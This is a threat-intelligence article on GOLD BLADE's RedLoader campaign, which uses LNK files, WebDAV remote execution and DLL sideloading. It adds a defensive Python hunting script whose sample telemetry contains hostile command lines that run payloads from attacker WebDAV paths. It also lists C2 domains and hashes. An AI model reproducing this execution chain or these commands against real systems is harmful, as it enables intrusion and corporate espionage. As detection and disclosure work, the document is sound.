
Threat Actors Use LNK Files to Deploy RedLoader Malware on Windows Systems

Sophos analysts have identified a novel infection chain employed by the financially motivated cybercriminal group GOLD BLADE, also known as RedCurl, Red Wolf, and Earth Kapre, to deploy their custom RedLoader malware on Windows systems.

This group, active since 2018 and specializing in commercial espionage, has been observed using highly targeted phishing emails to infiltrate organizations.

In recent campaigns spanning late 2024 to early 2025, GOLD BLADE has focused on human resources personnel, disguising malicious documents as job applicant resumes or curricula vitae.

The latest iteration, observed in July 2025, combines techniques seen in earlier campaigns in a way not previously reported: an LNK file triggers remote execution over WebDAV, and DLL sideloading is used to establish command-and-control (C2) communications.

This evolution highlights the group’s adaptability in bypassing defenses by repurposing legitimate tools and infrastructure.

Evolving Tactics in GOLD BLADE Campaigns

The attack begins with a well-crafted cover letter in PDF format, delivered via third-party job sites. Embedded within the PDF is a malicious link that downloads a ZIP archive containing an LNK file masquerading as a PDF document.

Upon opening, the LNK file executes conhost.exe, the legitimate Windows console host, which in turn uses WebDAV to connect to an attacker-controlled domain hosted on Cloudflare Workers.

This setup remotely hosts a renamed, signed executable originally from Adobe, such as ADNotificationManager.exe, disguised as a resume file.

Located in the same directory is the RedLoader stage 1 payload, a malicious DLL named netutils.dll.

The benign executable sideloads this DLL over WebDAV, so the malicious code runs without first being written to the victim's disk by the attacker, which evades some file-based endpoint detections.

Once loaded, RedLoader stage 1 creates a scheduled task on the compromised system, named in a victim-specific format like ‘BrowserQE\BrowserQE_<Base64-encoded computer name>’.

[Figure: The observed RedLoader execution chain]

This task downloads a standalone executable for RedLoader stage 2 from another attacker-controlled domain.

Unlike prior observations in September 2024, which involved remotely hosted DLLs, this stage uses a standalone executable reminiscent of tactics reported earlier in 2025.

The scheduled task employs PCALua.exe and conhost.exe to run the stage 2 executable, which bears a consistent SHA256 hash across samples despite victim-specific naming.

This executable then establishes C2 communications, transmits host information, and runs PowerShell scripts to enumerate the Active Directory environment, enabling follow-on espionage activity such as data exfiltration.

GOLD BLADE’s reliance on legitimately signed executables, like those from Adobe, for sideloading underscores their strategy of living-off-the-land, blending malicious payloads with trusted processes to maintain persistence and avoid detection.

This July 2025 chain merges WebDAV-based remote DLL execution first noted in September 2024 with the sideloading of renamed Adobe files seen in March 2025, representing a sophisticated recombination that has not been publicly documented until now.
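As an added detection example (not Sophos' code or anything taken from the report), the following Python script hunts for the three observable pieces of the chain described above in process-creation and scheduled-task records: conhost.exe started in headless mode or spawning a child from a WebDAV UNC path, a BrowserQE task whose Base64 suffix decodes to the local computer name, and a task action that chains pcalua.exe and conhost.exe. The log records, field names and file names (Resume_Smith.exe, update.exe) are constructed for the example; the `--headless` switch and the `\\host@SSL\DavWWWRoot\` UNC form are the standard Windows conhost and WebDAV mini-redirector conventions, not details given in the article.

```python
"""Hunt for GOLD BLADE / RedLoader execution-chain artefacts in telemetry.

Added example, not from Sophos or the original article. Records are constructed
in the shape of Sysmon-style process-creation and task-registration events; the
field names are assumptions, not a real product schema.
"""
import base64
import binascii
import re

# Constructed sample telemetry: three malicious records followed by benign noise.
EVENTS = [
    {"type": "process", "host": "HR-WS01",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"conhost.exe --headless "
                r"\\live.airemoteplant.workers.dev@SSL\DavWWWRoot\resume\Resume_Smith.exe"},
    {"type": "process", "host": "HR-WS01",
     "parent": r"C:\Windows\System32\conhost.exe",
     "image": r"\\live.airemoteplant.workers.dev@SSL\DavWWWRoot\resume\Resume_Smith.exe",
     "cmdline": "Resume_Smith.exe"},
    {"type": "task", "host": "HR-WS01",
     "name": r"\BrowserQE\BrowserQE_" + base64.b64encode(b"HR-WS01").decode(),
     "action": r"C:\Windows\System32\pcalua.exe -a C:\Windows\System32\conhost.exe "
               r"--headless C:\ProgramData\BrowserQE\update.exe"},
    {"type": "process", "host": "HR-WS01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"type": "task", "host": "HR-WS01",
     "name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "action": r"%systemroot%\system32\usoclient.exe StartScan"},
]

# WebDAV mini-redirector UNC forms: \\host@SSL\..., \\host@SSL@443\..., \\host\DavWWWRoot\...
# Plain SMB UNC paths deliberately do not match, to keep the rule quiet on file servers.
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@SSL(?:@\d+)?\\|\\DavWWWRoot\\)", re.I)

# Task naming format reported by Sophos: BrowserQE\BrowserQE_<Base64 computer name>
TASK_NAME = re.compile(r"\\?BrowserQE\\BrowserQE_([A-Za-z0-9+/=]+)$")


def decode_task_suffix(task_name):
    """Return the decoded Base64 suffix of a BrowserQE task name, or None."""
    match = TASK_NAME.search(task_name)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def check_process(ev):
    """Flag headless conhost.exe and anything it runs from a WebDAV share."""
    findings = []
    image, cmdline = ev["image"].lower(), ev["cmdline"]
    if image.endswith("\\conhost.exe") and "--headless" in cmdline.lower():
        findings.append("conhost.exe launched in headless mode")
    if ev["parent"].lower().endswith("\\conhost.exe") and WEBDAV_UNC.search(ev["image"]):
        findings.append("child of conhost.exe executed from a WebDAV UNC path")
    if WEBDAV_UNC.search(cmdline):
        findings.append("command line references a WebDAV UNC path")
    return findings


def check_task(ev):
    """Flag the victim-specific BrowserQE task and the pcalua.exe/conhost.exe action."""
    findings = []
    decoded = decode_task_suffix(ev["name"])
    if decoded is not None:
        if decoded.upper() == ev["host"].upper():
            findings.append(f"BrowserQE task suffix decodes to this host's name ({decoded})")
        else:
            findings.append(f"BrowserQE task suffix decodes to {decoded!r}")
    action = ev["action"].lower()
    if "pcalua.exe" in action and "conhost.exe" in action:
        findings.append("task action chains pcalua.exe and conhost.exe")
    return findings


def hunt(events):
    """Return (event index, findings) for every record that trips a rule."""
    alerts = []
    for idx, ev in enumerate(events):
        findings = check_process(ev) if ev["type"] == "process" else check_task(ev)
        if findings:
            alerts.append((idx, findings))
    return alerts


if __name__ == "__main__":
    for idx, findings in hunt(EVENTS):
        print(f"event {idx}: " + "; ".join(findings))
```

The Base64 check matters because the task name is victim-specific: a static string match on the suffix would miss every host, while decoding it and comparing to the local computer name confirms the naming scheme the report describes.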

Recommended Mitigations

To counter these threats, organizations should implement Software Restriction Policies via Group Policy Objects to block LNK file execution from high-risk directories, such as user downloads and application data folders.

According to the report, Sophos provides specific detections, including Evade_28k for blocking sideloading attempts with Adobe executables, WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1 for identifying suspicious conhost.exe child processes, and Troj/Agent-BLKU for static detection of RedLoader stage 2.

Reviewing and restricting access to known indicators can further mitigate risks, though caution is advised when investigating potentially malicious domains.

Key Indicators of Compromise (IOCs)

Indicator | Type | Context
automatinghrservices[.]workers[.]dev | Domain name | GOLD BLADE C2 server
quiet[.]msftlivecloudsrv[.]workers[.]dev | Domain name | GOLD BLADE C2 server
live[.]airemoteplant[.]workers[.]dev | Domain name | GOLD BLADE C2 server
netutils.dll | Filename | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading
d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc | SHA256 hash | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading
f5203c7ac07087fd5029d83141982f0a5e78f169cdc4ab9fc097cc0e2981d926 | SHA256 hash | RedLoader stage 2 deployed by GOLD BLADE
369acb06aac9492df4d174dbd31ebfb1e6e0c5f3 | SHA1 hash | RedLoader stage 2 deployed by GOLD BLADE
